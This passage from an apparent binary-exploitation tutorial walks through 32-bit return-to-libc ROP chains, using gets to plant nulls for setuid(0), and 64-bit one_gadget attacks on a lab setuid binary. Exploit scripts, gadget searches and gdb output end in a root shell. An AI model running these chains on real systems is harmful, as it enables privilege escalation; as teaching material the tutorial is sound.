terminating newline or EOF, which it replaces with a null byte ('\0').
So the end of our string in 'gets' is replaced by a null byte. What if we enter no input? Then just a single null byte is written to the destination. Yeah, we did it!
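To make that concrete, here is a tiny Python 3 model of what gets does to memory. It is only a simulation on a bytearray, not real libc code, and fake_gets is a made-up name. Calling it with an empty line at four consecutive addresses, as our chain will do later, zeroes a whole 4 byte word.

```python
def fake_gets(memory, dest, line):
    """Model gets(): copy the line up to the newline to dest, then write a NUL."""
    data = line.split(b"\n", 1)[0]
    memory[dest:dest + len(data)] = data
    memory[dest + len(data)] = 0
    return dest


# A 4-byte stack slot currently holding junk from our payload.
stack_slot = bytearray(b"BBBB")

# Pressing enter four times: each call writes exactly one NUL byte.
for i in range(4):
    fake_gets(stack_slot, i, b"\n")

print(stack_slot)
```

After the loop the slot holds four zero bytes, which is exactly the 0x00000000 we want setuid to read.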

Remember this is not the only way. You should explore more, and if you want you can share your ways with us in the comments. For example, we are going to learn another way in the format string exploit.

So on the stack 'gets' needs two values. The first is its return address and the next is the destination address to write to. This is what our payload will look like.
payload = 'A'*100 + ecx (desired esp + 0x4) + 'B'*4 + gets + return address + dest + setuid + return address + arg + system + exit + /bin/sh
To execute our exploit properly we need 4 null bytes, as these four bytes form the argument to setuid. Since each call writes only one null byte, we will call 'gets' four times. But there's a small problem in doing so. Think about it. When we first call 'gets', its argument is on the stack. If we directly return to the next 'gets', its arguments will be messed up. We need to somehow clear the stack for the next function call.

Exactly. We will pop the top of the stack first so that we can then return to the next 'gets' call. For that we need to find a pop;ret instruction sequence and use it as the return address of each call. It will clear the used argument off the stack for us, and then its ret instruction will set the program counter to the next address on top of the stack. And again libc is a great place to find such instructions. One way is like this.
virtual@mecha:~$ objdump -d -M intel /lib32/ | grep -B1 ret | grep pop -A1 -m 4
 1804b: 5f pop edi
 1804c: c3 ret 
 1816f: 5d pop ebp
 18170: c3 ret 
 181e6: 5e pop esi
 181e7: c3 ret 
 182b9: 5d pop ebp
 182ba: c3 ret
It finds four pop instructions, each followed by ret. Each such set of instructions is called a 'ROP gadget'. ROP gadgets aren't limited to pop; ret. They can be any series of instructions you want, typically ending in ret.

Processors are dumb

We know assembly is just mnemonics for opcodes, and processors start executing opcodes wherever you point them, even if that is the middle of another instruction. What I mean is, suppose there's an instruction which contains '5f' followed by 'c3'. If you point the processor to '5fc3' then it will execute the instructions 'pop edi; ret' irrespective of the original instruction and go on. All we have to do is find '5f' followed by 'c3' in libc. This way we can find even more gadgets.
virtual@mecha:~$ xxd -c1 -p /lib32/ | grep -n -B1 c3 | grep 5f -m3 -A1
virtual@mecha:~$ xxd -c1 -p /lib32/ | grep -n -B1 c3 | grep 5f -m3| awk '{printf"%x\n",$1-1}'
What I did here is
  1. Make a plain hexdump (-p) of libc, one byte per line (-c1).
  2. Pipe it and find all occurrences of c3 with their line numbers (-n) and the one line just before (-B1) each.
  3. Pipe and check if that line is 5f, and print 3 such occurrences (-m3) with one line after (-A1) it.
  4. Print the offset of '5f' ($1-1) in hexadecimal (%x).
Add the offset to the libc base address and you will get your instructions.
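The byte search described in the steps above can also be sketched in Python 3. This is a toy version, not a replacement for a real gadget finder: find_gadgets is a made-up name and the sample bytes are invented for the demo. On a real system you would read your libc file in binary mode instead, and the file offset only equals the offset from the libc base when the code segment is mapped from file offset 0, as it is in the maps above.

```python
def find_gadgets(blob, opcodes, limit=None):
    """Return the offsets of every occurrence of opcodes inside blob."""
    offsets = []
    start = blob.find(opcodes)
    while start != -1 and (limit is None or len(offsets) < limit):
        offsets.append(start)
        start = blob.find(opcodes, start + 1)
    return offsets


POP_EDI_RET = b"\x5f\xc3"   # pop edi; ret

# Invented sample: two nops, a real 'pop edi; ret', then '8b 5f c3',
# a single mov instruction that happens to contain 5f c3 in its middle.
sample = b"\x90\x90\x5f\xc3\x8b\x5f\xc3\x00"

offsets = find_gadgets(sample, POP_EDI_RET)
print([hex(o) for o in offsets])

# Turning an offset into an address: libc base + offset.
LIBC_BASE = 0xf7de6000
print(hex(LIBC_BASE + 0x1804b))
```

The second hit in the sample is the interesting one: it is not an instruction boundary in the original code, yet the processor will happily run it as pop edi; ret.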
gdb-peda$ x/2i 0xf7de6000+0x1804b
   0xf7dfe04b: pop    edi
   0xf7dfe04c: ret
But this way sucks, right? You can make your own tool to automate it. There are great tools already available, like ROPgadget and Ropper, which do the same work for you more smartly and also have lots of options to help you in ROP exploitation. Let's see how our stack will look now.

Time to make the payload and find the missing addresses. We currently don't know the stack address of the first 'gets' entry or of the setuid argument which we need to overwrite with NULLs.
gdb-peda$ p gets
$1 = {<text variable, no debug info>} 0xf7e4c610 <gets>
gdb-peda$ p setuid
$2 = {<text variable, no debug info>} 0xf7ea3e60 <setuid>
Making a python script this time.
from struct import pack
junk='A'*100                        #fills buf[100]
ecx='CCCC'                          #placeholder for saved ecx
pad='BBBB'                          #4 bytes of padding
gets=pack("<I",0xf7e4c610)          #gets
setuid=pack("<I",0xf7ea3e60)        #setuid
system=pack("<I",0xf7e22d60)        #system
exit=pack("<I",0xf7e16070)          #exit
pop=pack("<I",0xf7dfe04b)           #pop;ret
sh=pack("<I",0xf7f5c311)            #/bin/sh string
dest='DDDD'                         #first byte of setuid arg
desta='DDDD'                        #second byte of setuid arg
destb='DDDD'                        #third byte of setuid arg
destc='DDDD'                        #fourth byte of setuid arg
payload = ''
payload+= junk + ecx + pad
payload+= gets + pop + dest
payload+= gets + pop + desta
payload+= gets + pop + destb
payload+= gets + pop + destc
payload+= setuid + pop + pad        #argument for setuid
payload+= system + exit + sh
print payload
Set breakpoint and run exploit.
gdb-peda$ b *main+85
Breakpoint 1 at 0x5a2
gdb-peda$ r `python2`
Starting program: /home/virtual/buf `python2`

EAX: 0x0 
EBX: 0x56556fd4 --> 0x1edc 
ECX: 0xc0 
EDX: 0xf7fb6894 --> 0x0 
ESI: 0x2 
EDI: 0xf7fb5000 --> 0x1ced70 
EBP: 0xffffd208 --> 0xf7e4c610 (<gets>: push   ebp)
ESP: 0xffffd200 ("CCCC")
EIP: 0x565555a2 (<main+85>: pop    ecx)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
   0x56555597 <main+74>: add    esp,0x10
   0x5655559a <main+77>: mov    eax,0x0
   0x5655559f <main+82>: lea    esp,[ebp-0x8]
=> 0x565555a2 <main+85>: pop    ecx
   0x565555a3 <main+86>: pop    ebx
   0x565555a4 <main+87>: pop    ebp
   0x565555a5 <main+88>: lea    esp,[ecx-0x4]
   0x565555a8 <main+91>: ret
0000| 0xffffd200 ("CCCC")
0004| 0xffffd204 ("BBBB")
0008| 0xffffd208 --> 0xf7e4c610 (<gets>: push   ebp)
0012| 0xffffd20c --> 0xf7dfe04b (pop    edi)
0016| 0xffffd210 ("DDDD")
0020| 0xffffd214 --> 0xf7e4c610 (<gets>: push   ebp)
0024| 0xffffd218 --> 0xf7dfe04b (pop    edi)
0028| 0xffffd21c ("DDDD")
Legend: code, data, rodata, value

Breakpoint 1, 0x565555a2 in main ()
gdb-peda$ x/20xw $esp
0xffffd200: 0x43434343 0x42424242 0xf7e4c610 0xf7dfe04b
0xffffd210: 0x44444444 0xf7e4c610 0xf7dfe04b 0x44444444
0xffffd220: 0xf7e4c610 0xf7dfe04b 0x44444444 0xf7e4c610
0xffffd230: 0xf7dfe04b 0x44444444 0xf7ea3e60 0xf7dfe04b
0xffffd240: 0x42424242 0xf7e22d60 0xf7e16070 0xf7f5c311
First 'gets' is at 0xffffd208 so ecx=0xffffd208+0x4=0xffffd20c. And our argument for setuid comes at 0xffffd240. Let's modify our script.
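If you would rather not count words in the dump by hand, the slot addresses follow directly from the chain layout. A small Python 3 sketch, assuming the saved ecx sits at 0xffffd200 as in the dump above; the list CHAIN and the helper slot_addresses are made up for illustration.

```python
# One entry per 4-byte word, in the order the script appends them after junk.
CHAIN = [
    "ecx", "pad",
    "gets", "pop_ret", "dest",
    "gets", "pop_ret", "desta",
    "gets", "pop_ret", "destb",
    "gets", "pop_ret", "destc",
    "setuid", "pop_ret", "setuid_arg",
    "system", "exit", "binsh",
]

SAVED_ECX_ADDR = 0xffffd200   # esp at the *main+85 breakpoint


def slot_addresses(base, chain):
    """Pair every chain entry with the stack address it lands on."""
    return [(base + 4 * i, name) for i, name in enumerate(chain)]


slots = slot_addresses(SAVED_ECX_ADDR, CHAIN)

first_gets = next(addr for addr, name in slots if name == "gets")
setuid_arg = next(addr for addr, name in slots if name == "setuid_arg")
ecx_value = first_gets + 4    # because the epilogue sets esp = ecx - 4

print(hex(first_gets), hex(ecx_value), hex(setuid_arg))
```

The four dest values are then just setuid_arg, setuid_arg+1, setuid_arg+2 and setuid_arg+3, one per byte of the argument.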
from struct import pack
junk='A'*100                          #fills buf[100]
ecx=pack("<I",0xffffd20c)             #address of first gets + 0x4
pad='BBBB'                            #4 bytes of padding
gets=pack("<I",0xf7e4c610)            #gets
setuid=pack("<I",0xf7ea3e60)          #setuid
system=pack("<I",0xf7e22d60)          #system
exit=pack("<I",0xf7e16070)            #exit
pop=pack("<I",0xf7dfe04b)             #pop;ret
sh=pack("<I",0xf7f5c311)              #/bin/sh string
dest=pack("<I",0xffffd240)            #first byte of setuid arg
desta=pack("<I",0xffffd240+0x1)       #second byte of setuid arg
destb=pack("<I",0xffffd240+0x2)       #third byte of setuid arg
destc=pack("<I",0xffffd240+0x3)       #fourth byte of setuid arg
payload = ''
payload+= junk + ecx + pad
payload+= gets + pop + dest
payload+= gets + pop + desta
payload+= gets + pop + destb
payload+= gets + pop + destc
payload+= setuid + pop + pad          #argument for setuid
payload+= system + exit + sh
print payload
Set a breakpoint at setuid and run it to check that we are correct. Press Enter four times: each gets call waits for input, and on an empty line gets stores only a NULL byte at the destination.
gdb-peda$ r `python2`
Starting program: /home/virtual/buf `python2`
                                                                                                               ���BBBB ���K���@��� ���K���A��� ���K���B��� ���K���C���`>��K���BBBB`-��p`�� ���
Breakpoint 1, 0x565555a2 in main ()
gdb-peda$ b *setuid
Breakpoint 2 at 0xf7ea3e60
gdb-peda$ c

EAX: 0xffffd243 --> 0xe22d6000 
EBX: 0x42424242 ('BBBB')
ECX: 0xffffffff 
EDX: 0xf7fb68a0 --> 0x0 
ESI: 0x2 
EDI: 0xffffd243 --> 0xe22d6000 
EBP: 0xf7e4c610 (<gets>: push   ebp)
ESP: 0xffffd23c --> 0xf7dfe04b (pop    edi)
EIP: 0xf7ea3e60 (<setuid>: call   0xf7f184b9)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
   0xf7ea3e5a: xchg   ax,ax
   0xf7ea3e5c: xchg   ax,ax
   0xf7ea3e5e: xchg   ax,ax
=> 0xf7ea3e60 <setuid>: call   0xf7f184b9
   0xf7ea3e65 <setuid+5>: add    eax,0x11119b
   0xf7ea3e6a <setuid+10>: push   ebx
   0xf7ea3e6b <setuid+11>: sub    esp,0x28
   0xf7ea3e6e <setuid+14>: mov    edx,DWORD PTR [eax+0x3878]
No argument
0000| 0xffffd23c --> 0xf7dfe04b (pop    edi)
0004| 0xffffd240 --> 0x0 
0008| 0xffffd244 --> 0xf7e22d60 (: sub    esp,0xc)
0012| 0xffffd248 --> 0xf7e16070 (: call   0xf7f184b9)
0016| 0xffffd24c --> 0xf7f5c311 ("/bin/sh")
0020| 0xffffd250 --> 0x0 
0024| 0xffffd254 --> 0x995902ae 
0028| 0xffffd258 --> 0xd92fcebe 
Legend: code, data, rodata, value

Breakpoint 2, 0xf7ea3e60 in setuid () from /lib32/
YEAH! The argument to setuid is now overwritten with NULLs. Continue and you will see it executing /bin/sh. But we still won't get root, because we are inside gdb (a setuid binary runs without its elevated privileges while it is being debugged). Time to try outside gdb. The addresses that change outside gdb are the ones on the stack, that is, ecx and the address of the setuid argument. So I have just added a variable '' to both of them, whose value is the stack offset outside gdb. Run it. You should also check whether the payload contains 0x20, i.e. the SPACE character, because the shell will then split the argument into two parts and the whole payload may not be copied.
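Checking for such bytes by eye gets tedious, so here is a minimal Python 3 sketch of a checker. The helper name `find_bad_bytes` and the byte list are my own assumptions for a payload that is passed as a command-line argument and copied with strcpy(); the addresses are the ones from the gdb session above and will differ on your system.

```python
from struct import pack

# Bytes that break a payload delivered through argv (assumed list):
# NUL ends the C string, while space, tab and newline make the shell
# split the unquoted `...` output into several arguments.
BAD_BYTES = {0x00: "NUL", 0x09: "TAB", 0x0a: "LF", 0x20: "SPACE"}

def find_bad_bytes(payload):
    """Return (offset, name) for every problematic byte in payload."""
    return [(i, BAD_BYTES[b]) for i, b in enumerate(bytearray(payload)) if b in BAD_BYTES]

# gets, pop;ret, setuid argument slot, setuid, system, exit, "/bin/sh"
addresses = (0xf7e4c610, 0xf7dfe04b, 0xffffd240, 0xf7ea3e60,
             0xf7e22d60, 0xf7e16070, 0xf7f5c311)
chain = b"".join(pack("<I", a) for a in addresses)

print(find_bad_bytes(chain))                    # empty list: nothing to fix
print(find_bad_bytes(pack("<I", 0xf7e22d20)))   # hypothetical address whose low byte is 0x20
```

If the checker reports a hit, the usual way out is to pick a different gadget or an equivalent function whose address avoids that byte.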
virtual@mecha:~$ python2 
[+] Variables set. Making payload
[+] Payload ready. Exploiting Binary.
[#] Here comes the root shell. Press 'Enter' 4 times !

# id
uid=0(root) gid=1000(virtual) groups=1000(virtual),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)
# whoami
And boom after all we are root.

One more method to bypass a non-executable stack is to first make it executable. Yeah, we can do that using the 'mprotect()' function. 'mprotect()' changes the access protections for the calling process's memory pages containing any part of the address range in the interval [addr, addr+len-1]. It means you can change the permissions of the stack and then execute shellcode from it. We will do this in the next tutorial. Till then you can try it yourself.

Modern 64 bit Linux

32 bit return to libc was pretty easy; it only got a little trickier when getting root, where we had to write null bytes as the argument for setuid. Somehow we did that too. ROP exploitation on 64 bit can make you go nuts at the start with functions like strcpy, which don't copy null bytes. Why? It's because of the current 48-bit implementation of canonical form addresses. 64 bits can address 2^64 bytes (16 EiB) of virtual address space. However, currently only the least significant 48 bits of a virtual address are actually used in address translation. That means user-space addresses range from '0000 0000 0000 0000' to '0000 7fff ffff ffff'.

So in order to chain instructions we need to fill the next 8 bytes on the stack with a return address whose two most significant bytes are null. 8 bytes because it's 64 bit, and it will read the next 8 bytes as the return address. So chaining isn't possible with functions like strcpy, as the chain will break at the first null byte in the input. It can still be done with bugs like format string exploits, which we will learn in future posts, or when the code uses functions like read(), memcpy(), etc., which can copy null bytes.

Okay. So strcpy stops at null bytes, and we don't have any function in the code which will copy null bytes. That means we can only make it return to just one address. We now need to find one address with a ROP gadget that executes the shell for us.

Let us first understand a few basic differences between 32 bit and 64 bit assembly and how arguments are passed in 64 bit. I am using this simple code to execute a shell. Compiling and executing it will give you a shell. Let's load it in gdb and set a breakpoint at the execve() function call to find the arguments.
virtual@mecha:~$ gcc execve.c -o execve
virtual@mecha:~$ gdb -q execve
Reading symbols from execve...(no debugging symbols found)...done.
gdb-peda$ disas main
Dump of assembler code for function main:
   0x000000000000064a <+0>: push   rbp
   0x000000000000064b <+1>: mov    rbp,rsp
   0x000000000000064e <+4>: mov    edx,0x0
   0x0000000000000653 <+9>: mov    esi,0x0
   0x0000000000000658 <+14>: lea    rdi,[rip+0x95]        # 0x6f4
   0x000000000000065f <+21>: call   0x520 <execve@plt>
   0x0000000000000664 <+26>: nop
   0x0000000000000665 <+27>: pop    rbp
   0x0000000000000666 <+28>: ret    
End of assembler dump.
gdb-peda$ b *main+21
Breakpoint 1 at 0x65f
gdb-peda$ r
Starting program: /home/virtual/execve 

RAX: 0x55555555464a (<main>: push   rbp)
RBX: 0x0 
RCX: 0x0 
RDX: 0x0 
RSI: 0x0 
RDI: 0x5555555546f4 --> 0x68732f6e69622f ('/bin/sh')
RBP: 0x7fffffffe120 --> 0x555555554670 (<__libc_csu_init>: push   r15)
RSP: 0x7fffffffe120 --> 0x555555554670 (<__libc_csu_init>: push   r15)
RIP: 0x55555555465f (<main+21>: call   0x555555554520 <execve@plt>)
R8 : 0x5555555546e0 (<__libc_csu_fini>: repz ret)
R9 : 0x7ffff7de5ee0 (<_dl_fini>: push   rbp)
R10: 0x0 
R11: 0x0 
R12: 0x555555554540 (<_start>: xor    ebp,ebp)
R13: 0x7fffffffe200 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
   0x55555555464e <main+4>: mov    edx,0x0
   0x555555554653 <main+9>: mov    esi,0x0
   0x555555554658 <main+14>: lea    rdi,[rip+0x95]        # 0x5555555546f4
=> 0x55555555465f <main+21>: call   0x555555554520 <execve@plt>
   0x555555554664 <main+26>: nop
   0x555555554665 <main+27>: pop    rbp
   0x555555554666 <main+28>: ret    
   0x555555554667: nop    WORD PTR [rax+rax*1+0x0]
Guessed arguments:
arg[0]: 0x5555555546f4 --> 0x68732f6e69622f ('/bin/sh')
arg[1]: 0x0 
arg[2]: 0x0 
0000| 0x7fffffffe120 --> 0x555555554670 (<__libc_csu_init>: push   r15)
0008| 0x7fffffffe128 --> 0x7ffff7a161c1 (<__libc_start_main+241>: mov    edi,eax)
0016| 0x7fffffffe130 --> 0x40000 
0024| 0x7fffffffe138 --> 0x7fffffffe208 --> 0x7fffffffe50e ("/home/virtual/execve")
0032| 0x7fffffffe140 --> 0x1f7b987e8 
0040| 0x7fffffffe148 --> 0x55555555464a (<main>: push   rbp)
0048| 0x7fffffffe150 --> 0x0 
0056| 0x7fffffffe158 --> 0xaf6db58595500b01 
Legend: code, data, rodata, value

Breakpoint 1, 0x000055555555465f in main ()
If you look closely, the arguments are now passed in registers. The first is placed in rdi, the second in rsi, the third in rdx, and then rcx, r8 and r9. Only the 7th argument onwards is passed on the stack. This is the same for all function calls that take integer or pointer arguments.
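To make the register order easy to remember, here is a tiny Python 3 sketch that maps an argument list onto the registers described above. The helper `place_args` is purely illustrative (it is not part of any tool) and only models integer and pointer arguments.

```python
# Integer/pointer argument registers on 64 bit Linux, in order.
ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

def place_args(args):
    """Split args into register assignments and the leftovers that go on the stack."""
    in_regs = dict(zip(ARG_REGS, args))
    on_stack = list(args[len(ARG_REGS):])
    return in_regs, on_stack

# execve("/bin/sh", 0, 0) as seen at the breakpoint above
regs, stack = place_args([0x5555555546f4, 0, 0])
print(regs)    # rdi holds the string pointer, rsi and rdx are 0
print(stack)   # nothing spills onto the stack
```

This matches the "Guessed arguments" that peda printed: arg[0] comes from rdi, arg[1] from rsi and arg[2] from rdx.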

Finding One Gadget

Okay, back to the topic. We can't chain gadgets because of the null bytes in the addresses, so we need to find one gadget that, on its own, does something like the above disassembly: sets the registers and calls execve for us. Again, time to search in libc.
virtual@mecha:~$ ldd buf64 | grep libc
 => /lib/x86_64-linux-gnu/ (0x00007ffff77f3000)
virtual@mecha:~$ strings -tx /lib/x86_64-linux-gnu/ | grep /bin/sh
 1a3f20 /bin/sh
virtual@mecha:~$ objdump -M intel -d /lib/x86_64-linux-gnu/ | grep execve -B5 | grep rdi -C3 | grep 1a3f20 -C3
   d975a: 49 8d 7d 10           lea    rdi,[r13+0x10]
   d975e: e8 4d 6f f4 ff        call   206b0 <*ABS*+0x953c0@plt>
   d9763: 48 8d 3d b6 a7 0c 00  lea    rdi,[rip+0xca7b6]        # 1a3f20 <_libc_intl_domainname@@GLIBC_2.2.5+0x186>
   d976a: 48 89 da              mov    rdx,rbx
   d976d: 4c 89 ee              mov    rsi,r13
   d9770: e8 8b f8 ff ff        call   d9000 <execve@@GLIBC_2.2.5>
   d9a2c: e8 7f 6c f4 ff        call   206b0 <*ABS*+0x953c0@plt>
   d9a31: 48 8b 8d 60 ff ff ff  mov    rcx,QWORD PTR [rbp-0xa0]
   d9a38: 48 8b 55 90           mov    rdx,QWORD PTR [rbp-0x70]
==>d9a3c: 48 8d 3d dd a4 0c 00  lea    rdi,[rip+0xca4dd]        # 1a3f20 <_libc_intl_domainname@@GLIBC_2.2.5+0x186>
   d9a43: 48 89 ce              mov    rsi,rcx
   d9a46: e8 b5 f5 ff ff        call   d9000 <execve@@GLIBC_2.2.5>
   fccd9: e8 52 7b 00 00        call   104830 <__close@@GLIBC_2.2.5>
==>fccde: 48 8b 05 c3 d1 2d 00  mov    rax,QWORD PTR [rip+0x2dd1c3]        # 3d9ea8 <__environ@@GLIBC_2.2.5-0x31b0>
   fcce5: 48 8d 74 24 40        lea    rsi,[rsp+0x40]
   fccea: 48 8d 3d 2f 72 0a 00  lea    rdi,[rip+0xa722f]        # 1a3f20 <_libc_intl_domainname@@GLIBC_2.2.5+0x186>
   fccf1: 48 8b 10              mov    rdx,QWORD PTR [rax]
   fccf4: e8 07 c3 fd ff        call   d9000 <execve@@GLIBC_2.2.5>
   fdb89: e8 a2 6c 00 00        call   104830 <__close@@GLIBC_2.2.5>
==>fdb8e: 48 8b 05 13 c3 2d 00  mov    rax,QWORD PTR [rip+0x2dc313]        # 3d9ea8 <__environ@@GLIBC_2.2.5-0x31b0>
   fdb95: 48 8d 74 24 70        lea    rsi,[rsp+0x70]
   fdb9a: 48 8d 3d 7f 63 0a 00  lea    rdi,[rip+0xa637f]        # 1a3f20 <_libc_intl_domainname@@GLIBC_2.2.5+0x186>
   fdba1: 48 8b 10              mov    rdx,QWORD PTR [rax]
   fdba4: e8 57 b4 fd ff        call   d9000 <execve@@GLIBC_2.2.5>
What did I do here?
  1. Found the offset of the /bin/sh string.
  2. Disassembled libc, found all execve calls and printed the 5 lines before each.
  3. Piped that output and kept the lines mentioning rdi, with 3 lines before and after each.
  4. Piped that output and kept the references to the /bin/sh string location.
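The steps above can also be sketched in Python 3 instead of a grep pipeline. This is only a rough sketch under my own assumptions: the function name `find_execve_binsh_calls` is made up, it expects lines in the `objdump -M intel -d` format shown above, and it reports the address of the execve call rather than the start of the gadget, so you still have to read the few lines before each hit.

```python
def find_execve_binsh_calls(disasm_lines, binsh_offset, window=5):
    """Return addresses of execve calls that have a 'lea rdi' pointing at
    binsh_offset within the `window` lines before the call."""
    # objdump annotates rip-relative operands like "# 1a3f20 <symbol+off>"
    marker = "# %x " % binsh_offset
    hits = []
    for i, line in enumerate(disasm_lines):
        if "call" in line and "<execve@@" in line:
            before = disasm_lines[max(0, i - window):i]
            if any("lea" in l and "rdi" in l and marker in l for l in before):
                hits.append(int(line.split(":")[0], 16))
    return hits

# Four lines copied from the objdump output above
sample = [
    "   d9763: 48 8d 3d b6 a7 0c 00  lea    rdi,[rip+0xca7b6]        # 1a3f20 <_libc_intl_domainname@@GLIBC_2.2.5+0x186>",
    "   d976a: 48 89 da              mov    rdx,rbx",
    "   d976d: 4c 89 ee              mov    rsi,r13",
    "   d9770: e8 8b f8 ff ff        call   d9000 <execve@@GLIBC_2.2.5>",
]
print([hex(a) for a in find_execve_binsh_calls(sample, 0x1a3f20)])   # ['0xd9770']
```

In practice you would feed it the full disassembly of your own libc, split into lines.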
Observing the instructions, we have found 3 such gadgets (marked by arrows) which should do our work. I also found a tool online, one_gadget, which will help you find such one-gadget ROP targets. It's available as a Ruby gem: $ gem install one_gadget . It can find even more such gadgets and also shows the constraints on the arguments. Add the offset of the gadget to the libc base address and overwrite the return address with the result.
gdb-peda$ vmmap
Start              End                Perm Name
0x0000555555554000 0x0000555555555000 r-xp /home/virtual/buf64
0x0000555555754000 0x0000555555755000 r--p /home/virtual/buf64
0x0000555555755000 0x0000555555756000 rw-p /home/virtual/buf64
0x00007ffff79f5000 0x00007ffff7bcb000 r-xp /lib/x86_64-linux-gnu/
0x00007ffff7bcb000 0x00007ffff7dcb000 ---p /lib/x86_64-linux-gnu/
0x00007ffff7dcb000 0x00007ffff7dcf000 r--p /lib/x86_64-linux-gnu/
0x00007ffff7dcf000 0x00007ffff7dd1000 rw-p /lib/x86_64-linux-gnu/
0x00007ffff7dd1000 0x00007ffff7dd5000 rw-p mapped
0x00007ffff7dd5000 0x00007ffff7dfc000 r-xp /lib/x86_64-linux-gnu/
0x00007ffff7fde000 0x00007ffff7fe0000 rw-p mapped
0x00007ffff7ff7000 0x00007ffff7ffa000 r--p [vvar]
0x00007ffff7ffa000 0x00007ffff7ffc000 r-xp [vdso]
0x00007ffff7ffc000 0x00007ffff7ffd000 r--p /lib/x86_64-linux-gnu/
0x00007ffff7ffd000 0x00007ffff7ffe000 rw-p /lib/x86_64-linux-gnu/
0x00007ffff7ffe000 0x00007ffff7fff000 rw-p mapped
0x00007ffffffde000 0x00007ffffffff000 rw-p [stack]
0xffffffffff600000 0xffffffffff601000 r-xp [vsyscall]
gdb-peda$ x/5i 0x00007ffff79f5000+0xfdb8e
 0x7ffff7af2b8e <exec_comm+2366>: mov rax,QWORD PTR [rip+0x2dc313] # 0x7ffff7dceea8
 0x7ffff7af2b95 <exec_comm+2373>: lea rsi,[rsp+0x70]
 0x7ffff7af2b9a <exec_comm+2378>: lea rdi,[rip+0xa637f] # 0x7ffff7b98f20
 0x7ffff7af2ba1 <exec_comm+2385>: mov rdx,QWORD PTR [rax]
 0x7ffff7af2ba4 <exec_comm+2388>: call 0x7ffff7ace000 <execve>
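The same arithmetic can be done in a few lines of Python 3 when building the exploit. The base address and offsets below are the ones from the vmmap and objdump output above; the helper name `rebase` is just for illustration, and all of these values will be different on your machine.

```python
from struct import pack

LIBC_BASE = 0x00007ffff79f5000    # first r-xp libc mapping in the vmmap output
GADGET_OFFSET = 0xfdb8e           # one of the gadgets marked with an arrow
BINSH_OFFSET = 0x1a3f20           # offset of the /bin/sh string

def rebase(base, offset):
    """Turn an offset inside libc into an absolute address."""
    return base + offset

gadget = rebase(LIBC_BASE, GADGET_OFFSET)
print(hex(gadget))                            # 0x7ffff7af2b8e, same as gdb shows
print(hex(rebase(LIBC_BASE, BINSH_OFFSET)))   # 0x7ffff7b98f20, the lea rdi target
print(repr(pack("<Q", gadget)))               # the 8 bytes that overwrite the return address
```

Note the two zero bytes at the end of the packed address. Because of little-endian order they come last in memory, which is why a single address still works with strcpy.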

virtual@mecha:~$ python2
$ id
uid=1000(virtual) gid=1000(virtual) groups=1000(virtual),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)
$ whoami
Great, we redirected the code execution flow to execute a shell. But what about root? Our privileges were dropped. Since the source code uses strcpy() and chaining gadgets requires null bytes on the stack to form correct addresses, I wasn't able to find any one_gadget which would execute both setuid(0) and execve("/bin/sh",0,0) for us. If any of you is successful in getting root, do share with us.
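To see why the chain breaks, here is a small Python 3 simulation of what strcpy() would copy from a two-address chain. `strcpy_copied` is a made-up helper that only mimics the "stop at the first null byte" behaviour; the gadget address is the one computed in gdb above and the second address is a dummy.

```python
from struct import pack

def strcpy_copied(src):
    """Bytes strcpy would write: everything before the first NUL, plus the terminator."""
    return src.split(b"\x00", 1)[0] + b"\x00"

gadget = 0x7ffff7af2b8e                     # one_gadget address from the gdb session
chain = pack("<Q", gadget) + pack("<Q", 0x4141414141414141)   # dummy second address

copied = strcpy_copied(chain)
print(len(chain), len(copied))   # 16 bytes built, only 7 copied
print(repr(copied))              # 6 address bytes and the terminating NUL
```

The first address survives only because the saved return address it overwrites already has zeros in its top two bytes: strcpy writes the six non-null bytes plus its terminator, and the eighth byte is left as it was. The second address never reaches the stack.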

Getting root on 64 bit

We have realised that we can't chain gadgets with strcpy() because of nulls. This time we will demonstrate a scenario where the vulnerable code uses the read() function, and chain gadgets to get root. read() can copy null bytes onto the stack.
virtual@mecha:~$ gcc suid64.c -o suid64 -fno-stack-protector
virtual@mecha:~$ sudo chown root suid64
virtual@mecha:~$ sudo chmod +s suid64
As you can see, read copies up to 200 bytes into buf, which is only 100 bytes in size, so a buffer overflow is clearly possible. Since arguments are passed in registers on 64 bit, our payload is now a little different from 32 bit. The argument to setuid must be '0', and it is passed in rdi. So we need to somehow get '0' into rdi. The best way is to get it on top of the stack and pop it into rdi. Great. So we first need a gadget "pop rdi; ret", then null, and then we will call setuid and then the execve one_gadget. Our payload will now look like this.
payload = junk + poprdi + null + setuid + onegadget
Here main's return address is overwritten with the address of "pop rdi; ret". When that executes, the null bytes will be on top of the stack and will get popped into rdi, forming the argument for setuid. Then it will return to setuid, which will in turn return to the execve one_gadget. Here's a script for that. Remember the tip from the previous article for programs with an input prompt?
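A minimal Python 3 sketch of that payload layout could look like the following. Treat every number in it as an assumption: the junk length of 120 and the libc base are borrowed from elsewhere in this post, the one_gadget offset is the one found earlier, and the offsets for "pop rdi; ret" and setuid are placeholders that you must replace with the values from your own libc.

```python
from struct import pack

def p64(value):
    """Pack an address as 8 little-endian bytes."""
    return pack("<Q", value)

def build_chain(junk_len, pop_rdi, setuid, one_gadget):
    """junk + pop rdi;ret + 0 + setuid + one_gadget, as described above."""
    payload = b"A" * junk_len    # filler up to the saved return address
    payload += p64(pop_rdi)      # overwrites main's return address
    payload += p64(0)            # popped into rdi: the argument for setuid
    payload += p64(setuid)       # 'ret' of the gadget lands in setuid
    payload += p64(one_gadget)   # setuid returns into the execve gadget
    return payload

LIBC_BASE = 0x00007ffff79f5000        # from the vmmap output earlier
POP_RDI = LIBC_BASE + 0x1111          # placeholder offset, find your own
SETUID = LIBC_BASE + 0x2222           # placeholder offset, find your own
ONE_GADGET = LIBC_BASE + 0xfdb8e      # gadget offset found earlier

payload = build_chain(120, POP_RDI, SETUID, ONE_GADGET)   # 120 is an assumed junk length
print(len(payload))   # 152 bytes, which fits in read()'s 200
```

To feed it to the binary, write the raw bytes to stdout (sys.stdout.buffer.write(payload) in Python 3) and pipe it in together with cat, so that stdin stays open for the shell.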
virtual@mecha:~$ (python2;cat) | ./suid64 
